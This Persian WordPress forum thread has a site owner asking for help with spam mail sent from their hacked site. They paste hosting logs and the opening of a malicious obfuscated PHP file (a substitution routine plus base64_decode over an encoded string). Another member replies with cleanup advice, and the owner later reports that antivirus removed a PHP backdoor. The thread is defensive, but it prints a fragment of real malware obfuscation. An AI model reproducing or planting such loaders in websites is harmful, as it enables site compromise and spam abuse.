hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط ismaeil
      با سلام
      توضیحات فروشنده
      سایت بازاریابی دی جی تم digi-theme.ir جزو وبسایت های شناخته شده و برتر قالب وردپرس که دارای یک بخش برای فروش قالب ها و افزونه های وردپرس (بازاریابی سایت راستچین) میباشد /
      در این سایت هیچ قالب یا افزونه ای برای فروش قرار داده نشده است و تنها لینک خرید ریداکت به سایت راستچین است و با هر خریدی که صورت می گیرد 10 درصد به صورت پوسانت بدون هیچ زحمتی برای شما ثبت می شود.
      فروش محصولات بدین صورت می‌باشد که هر محصولی که فروخته شد، ۸۰% از مبلغ به طراح، ۲.۵% به سیستم پرداخت آنلاین , ۱۰% سهم بازاریابی محصول و ۷.۵% به سایت راست چین تعلق می‌گیرد!
      از چه روش هایی از این سایت کسب درآمد می شود؟
      فروش از خود سایت صورت نمی گیرد بلکه بازاریابی سایت راستچین است. محصولات خودتان را هم می توانید جهت فروش edd قرار بدهید/
      چرا باید این وب سایت را خریداری کنید؟
      این وبسایت از هر نظر پتانسیل بسیار بالایی برای پیشرفت دارد و از طرفی شناخته شده هست و مشتریان زیادی دارد، اگر شخص خریدار فقط کمی به آن برسد و محتوا و محصولات جدید وارد کنید مطمئنا بازخورد خیلی خوبی خواهد گرفت. از انجایی که راه اندازی یک سایت جدید مشکل و وقت زیادی لازم دارد این سایت بازدید داشته و با قرار دادن محصولات خودتان می توانید فروش مستقیم داشته باشید.
      این سایت به چه دلیل به فروش می رسد؟
      متاسفانه به دلیل مشغله بسیار زیاد و مشکلات مالی توانایی ادامه دادن سایت وجود ندارد/
      قیمت نهایی سایت چند است؟
      برای سایت قیمت خاصی در نظر گرفته نشده است. در صورتی که تمایل به خرید وب سایت دارید قیمت پیشنهادی خود را به آی دی زیر ارسال بفرمایید پس از 1 هفته به بالاترین قیمت واگذار می شود/
      آی دی تلگرام:
      @omidtalebymoradpoor

      و

       

    • توسط amir33
      من بعد از فعال کردن هدر و فوتر ساخته شده با المنتور کلا رنگ بندی سایتم بهم میخوره و دیگ نمیتونم درستش کنم . سایتمو قبلا با ویژوال کامپوزر درست کردم تو بعضی از قسمت ها هم عکسایی که گذاشتم با ویژوال کامپوزر لود نمیشه.هر رنگ بندی جدیدی هم که توی قالبم تنظیم میکنم روی سایت اعمال نمیشه . اون تیکی که توی تنظیمات المنتور هست که رنگ هارو از پوسته بگیره رو هم زدم  ولی باز درست نشد.بادی سایت کلا سفید میشه و دیگ نمیشه رنگش رو عوض کردم مگر اینکه هدر و فوتر سایت رو عوض کنیم ینی بزارم روی هدر و فوتری که با قالب ساختم نه با المنتور.
      ممنون میشم اگر کسی میدونه در این مورد من رو راهنمایی کنه بدجوری به مشکل خوردم . قالب سایتم زفایر هست .
    • توسط yamonil
      سلام به همگی 
      یه شرکت از قبل crm خریده و الان میخوام سایت وردپرسی براشون راه اندازی کنم که وصل بشه به اون crm و خرید محصولات  و بقیه روالش با اون crm انجام بشه. به انبار وصل بشه و محصولات در سایت نمایش داده بشه اما روال خریدش به اون crm وصل بشه .
      ممنون می شم راهنماییم کنید
    • توسط armin19901369
       با سلام و احترام
      یک وبسایت بر مبنای وردپرس دارم. پروژه در رابطه با ارتقا افزونه های وردپرسی هست و شامل دو قسمت زیر هست:
      ۱-در وبسایت از سیستم امتیازدهی با افزونه mycred رو دارم. هوک های پیش فرض افزونه شامل گراویتی فرم هست و بر مبنای پر کردن هر فرم به کاربر امتیاز میده.
      بعد از پر کردن فرم ها با استفاده از افزونه گراویتی فلو روندهایی برای فرم ها انجام میشه. می خوام یه هوک توی mycred تعریف بشه که در صورتی که یک روند برای فرم انجام شد به کاربر امتیاز بده. یعنی یه هوک برای گراویتی فلو تو mycred تعریف بشه.
      ۲-. افزونه mycred برای referal هایی که منجر به ثبت نام کاربر بشه به کاربر ارجاع دهنده امتیاز میده. این در صورتی کار می کنه که از ثبت نام پیش فرض وردپرس استفاده بشه.ثبت نام در حال حاضر از طریق افزونه digits و با استفاده از شماره موبایل انجام میشه
      می خوام با ثبت نام کاربر از طریق digits هم امتیاز ارجاع داده بشه.
      ممنون میشم هزینه و زمان رو برای انجام هر قسمت پروژه بفرمایید.
    • توسط soshiant
      درود دوستان
       
      من زمانی که پست ها رو زمان بندی میکنم، گاهی بعضی از پست ها در زمان تعیین شده ارسال نمیشه و وقتی به «نوشته» رجوع میکنم جلوی پست نوشته «زمان از دست رفته».
      ضمنا در بخش سلامت سایت هم یه همچین اروری وجود داره که احتمالا مرتبط با همین اشکال هست:
      «The scheduled event, daily_clean_database, is late to run. Your site still works, but this may indicate that scheduling posts or automated updates may not work as intended.»
       
      میدونید مشکل چیه و چطور باید رفعش کنم؟
      سپاس